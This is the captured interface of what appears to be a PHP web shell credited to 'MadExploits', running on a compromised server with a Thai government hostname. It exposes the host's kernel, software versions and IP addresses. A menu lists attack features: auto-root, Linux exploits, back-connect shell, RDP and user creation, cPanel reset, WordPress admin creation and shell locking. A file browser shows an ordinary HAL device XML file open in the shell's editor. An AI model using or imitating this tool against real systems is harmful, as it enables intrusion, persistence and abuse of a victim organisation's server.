Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
hal /
fdi /
preprobe /
10osvendor /
[ HOME SHELL ]
Name
Size
Permission
Action
10-ide-drives.fdi
4.29
KB
-rw-r--r--
20-broken-usb-sticks.fdi
2.41
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 10-ide-drives.fdi
<?xml version="1.0" encoding="UTF-8"?> <deviceinfo version="0.2"> <device> <!-- Handle weird Dell Laptops that slow down the system if the optical drive is polled (RH Bug #138148) --> <match key="storage.bus" string="ide"> <match key="storage.model" string="HL-DT-STCD-RW/DVD-ROM GCC-4240N"> <match key="block.device" string="/dev/hdb"> <merge key="storage.media_check_enabled" type="bool">false</merge> </match> <match key="block.device" string="/dev/hdd"> <merge key="storage.media_check_enabled" type="bool">false</merge> </match> </match> </match> <!-- Handle weird IDE drives (Jaz and Zip) by matching on the IDE model --> <match key="storage.bus" string="ide"> <match key="storage.drive_type" string="disk"> <!-- IOMEGA Zip Drive --> <match key="storage.model" contains_ncase="ZIP"> <merge key="storage.drive_type" type="string">zip</merge> <merge key="storage.no_partitions_hint" type="bool">true</merge> <merge key="storage.requires_eject" type="bool">true</merge> <!-- treat as floppy and data at partition 4, adjust device file --> <append key="block.device" type="string">4</append> </match> <!-- IOMEGA CLIK! Drive --> <match key="storage.model" contains_ncase="CLIK"> <merge key="storage.drive_type" type="string">zip</merge> <merge key="storage.no_partitions_hint" type="bool">true</merge> <merge key="storage.requires_eject" type="bool">true</merge> <!-- treat as floppy and data at partition 4, adjust device file --> <append key="block.device" type="string">4</append> </match> <!-- Jaz --> <match key="storage.model" contains_ncase="JAZ"> <merge key="storage.drive_type" type="string">jaz</merge> <merge key="storage.no_partitions_hint" type="bool">true</merge> <merge key="storage.requires_eject" type="bool">true</merge> <!-- treat as floppy and data at partition 4, adjust device file --> <append key="block.device" type="string">4</append> </match> </match> </match> <match key="storage.bus" string="ide"> <match key="storage.drive_type" string="floppy"> <!-- IOMEGA Zip Drive --> <match key="storage.model" contains_ncase="ZIP"> <merge key="storage.drive_type" type="string">zip</merge> <merge key="storage.no_partitions_hint" type="bool">true</merge> <merge key="storage.requires_eject" type="bool">true</merge> <!-- treat as floppy and data at partition 4, adjust device file --> <append key="block.device" type="string">4</append> </match> <!-- IOMEGA CLIK! Drive --> <match key="storage.model" contains_ncase="CLIK"> <merge key="storage.drive_type" type="string">zip</merge> <merge key="storage.no_partitions_hint" type="bool">true</merge> <merge key="storage.requires_eject" type="bool">true</merge> <!-- treat as floppy and data at partition 4, adjust device file --> <append key="block.device" type="string">4</append> </match> <!-- Jaz --> <match key="storage.model" contains_ncase="JAZ"> <merge key="storage.drive_type" type="string">jaz</merge> <merge key="storage.no_partitions_hint" type="bool">true</merge> <merge key="storage.requires_eject" type="bool">true</merge> <!-- treat as floppy and data at partition 4, adjust device file --> <append key="block.device" type="string">4</append> </match> </match> </match> <match key="storage.bus" string="scsi"> <match key="storage.drive_type" string="disk"> <!-- IOMEGA Zip Drive --> <match key="storage.model" contains_ncase="ZIP"> <merge key="storage.drive_type" type="string">zip</merge> <merge key="storage.requires_eject" type="bool">true</merge> </match> <!-- IOMEGA CLIK! Drive --> <match key="storage.model" contains_ncase="CLIK"> <merge key="storage.drive_type" type="string">zip</merge> <merge key="storage.requires_eject" type="bool">true</merge> </match> <!-- Jaz --> <match key="storage.model" contains_ncase="JAZ"> <merge key="storage.drive_type" type="string">jaz</merge> <merge key="storage.requires_eject" type="bool">true</merge> </match> </match> </match> </device> </deviceinfo>
Close